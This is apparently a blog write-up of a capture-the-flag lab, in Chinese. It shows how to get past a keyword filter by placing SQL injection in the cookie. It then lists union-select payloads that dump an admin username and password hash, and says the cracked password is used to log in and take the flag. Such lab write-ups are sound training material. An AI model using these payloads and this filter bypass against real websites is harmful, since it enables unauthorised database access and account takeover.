1,随便选择一则新闻,同样判断是否存在SQL注入发现存在and update delete ; insert mid master限制

and update delete ; insert mid master 等非法字符!

http://kypt8004.ia.aqlab.cn/shownews.asp?id=171 order by 2可以先判断字段数,存在十个字段

2,关键字拦截,可以尝试在cookie中传入,注意空格要用+代替,使用插件Modhearder可以改变cookie

首先在值的位置输入id=171+union+select+1,2,3,4,5,6,7,8,9,10数据库报错,再次尝试id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin是否存在admin表,存在admin在数据库中,并且23789五处回显点。

3,(查的其他破解方法好像都是直接知道列名是username和password的,不知道咋出来的列名,information_schema表格无法查询,只能查询admin)查找username和password列id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin

username为admin,password为b9a2a2b5dffb918cb9a2a2b5dffb918c flag错误,进行解密

welcome,welcome也提交失败,尝试别的方法welcome是password可以扫一下是否有登录页面

存在登录页面,输入账号,密码

拿到flag是zkz{welcome-control}

通关成功!!!!

封神台靶场-尤里的复仇-第二章相关推荐

  1. 封神台靶场-尤里的复仇-第一章

    1,在点击过新闻一后发现网址变为http://cntj8003.ia.aqlab.cn/index.php?id=1 ,尝试是否存在注入,输入and 1=1和and 1=2看返回内容是否相同来判断是否 ...

  2. 封神台靶场尤里的复仇I第一第二第五第六第七章解题思路(持续更新)

    文章目录 一 .第一章 二.第二章 三.第五章 四.第六章 五.第七章 总结 提示: 本文按照靶场题目推进顺序进行,由于作者水平有限,有讲述不当之处敬请批评指出,有更好的解法欢迎在评论区发表. 本文将 ...

  3. 封神台(尤里的复仇Ⅱ 回归)绕过防护getshell

    解题思路 习惯在url后加admin,看是不是管理后台. 一看发现是,就不用目录扫描工具了 填入正确的验证码,抓包输入',查看有无报错 发现报错了,存在报错注入,看报错描述可以知道是字符型注入 查看当 ...

  4. 封神台(尤里的复仇Ⅱ 回归)渗透第一步 信息收集1

    前言 解题过程 前言 做这道题的时候,我的心情真是跌宕起伏..为什么这么说,且听我娓娓道来. 解题过程 打开传送门,被传送到这个网站 随便点了几个模块,感觉都没有可利用的漏洞,直接扫描目录去了 扫到了 ...

  5. 封神台靶场(一)为了女神小芳 【SQL注入攻击】(超级详细)

    文章目录 前言 一.概括 二.题目要求 三.实践步骤 1.找到可以影响网页的参数 2.判断网站是否存在漏洞 3.order by判断字段数 4.union判断回显点 5.数据查询 总结 前言 本篇文章 ...

  6. 封神台靶场writeup

    封神台靶场 https://hack.zkaq.cn/battle 还是很有意思的一个靶场 查看源码,找到了字典文件: 用域名爆破工具,放入字典后爆破:答案为:http://8adc3387c2ed6 ...

  7. mbp 封神台靶场 一(笔记)

    最近在看掌控安全的公开课,里面提到了封神台靶场,因为以前也做过网易云课堂的靶场,便轻车熟路地注册了账号登陆靶场,先看了第一关.第一关是通过SQL注入找到管理员密码,打开链接,点进去一看发现有猫腻. 一 ...

  8. 封神台在线靶场--尤里的复仇Ⅰ 小芳!【8题】

    尤里的复仇Ⅰ 小芳![8题] 第一章:为了女神小芳! 第二章:遇到阻难!绕过WAF过滤! 第三章:为了更多的权限!留言板! 第四章:进击!拿到Web最高权限! 第五章:SYSTEM!POWER! 第六 ...

  9. 封神台靶场 kali训练营第二关WP

    打开靶场 测试注入点1' and 1=2 #页面报错,存在注入 直接跑sqlmap sqlmap指令:-u(指定注入点)                              --dbs(查看库) ...

最新文章

  1. 30个绝对令你惊叹的墙壁涂鸦作品
  2. Pytorch 自定义激活函数前向与反向传播 ReLu系列 含优点与缺点
  3. VS2019 更新MSDN并创建快捷方式
  4. java绘制图形_Java绘制图形
  5. 20145328 《信息安全系统设计基础》第2周学习总结
  6. java(17) - 增强for循环、装箱拆箱、可变参数
  7. android布局边缘加深,Android布局属性详解
  8. 用于企业服务总线的类 USB 通用端口类型,第 1 部分: 当前 ESB 存在的问题
  9. 使用HTML5,CSS3和jQuery增强网站用户体验
  10. ORACLE P6 21.12 系统虚拟机(VM)分享
  11. STM32入门指南(0)—配置开发环境
  12. 什么是http服务器
  13. 企业管理信息系统成功实施的四个阶段
  14. java--集合(1)--黑马程序员
  15. 小米手机刷机为Linux,小米5 刷机LineageOS 14.1的详细教程
  16. 【开发工具下载汇总】
  17. python-requests官网_Python-Requests1-批量登录获取uid
  18. Dns与httpDNS的区别
  19. singleTask vs singleInstance
  20. 安装gensim库的方法最终解答!

热门文章

  1. 不恰当使用线程池处理 MQ 消息引起的故障
  2. 微分方程求解matlab冲激信号,用Matlab求冲激响应的几种方法
  3. 光学定位与追踪技术_光学跟踪技术定位精准罗技M90鼠标仅32
  4. python socket清空接收缓冲区_Python网络编程——修改套接字发送和接收的缓冲区大小...
  5. 浙教版数学作业本,参考答案如此下载
  6. iOS7+系统自带条码扫描
  7. 【超简易】网站ioc图标添加【超详细】
  8. echarts html ppt,PPT美化之echarts
  9. 7-2 符号配对 (25 分)(C语言版)
  10. SQLite获取查询结果数